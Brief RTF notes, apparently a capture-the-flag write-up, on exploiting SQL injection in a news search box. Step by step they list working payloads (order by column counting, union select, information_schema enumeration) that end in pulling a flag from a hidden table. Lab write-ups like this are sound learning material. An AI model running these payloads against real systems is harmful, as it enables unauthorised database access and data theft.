{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww14600\viewh15620\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 * Search news:\
\
* search: ' => 500 status => maybe SQLi\
\
* search: ' or 1=1 # \
	=> all news post show\
	=> SQLi\
\
* how many columns ?\
	searh: ' order by 4 # => 500 status\
				 ' order by 3 # => has result\
	=> 3 columns\
\
* check type of column\
	search: ' union select 'a', 'b', 'c' # => has result\
	=> varchar\
\
* show all table in this database\
	search: ' union select null, table_name, null from information_schema.tables #	\
	=> find 'secret_table'\
\
* find name column of 'secret_table'\
	search: ' union select null, column_name, null from information_schema.columns where table_name='secret_table' #\
	=> 2 columns: id, fl4g\
	\
* select content of table:\
	search: ' union select null, fl4g, null from secret_table #\
	=> got flag\
	\
}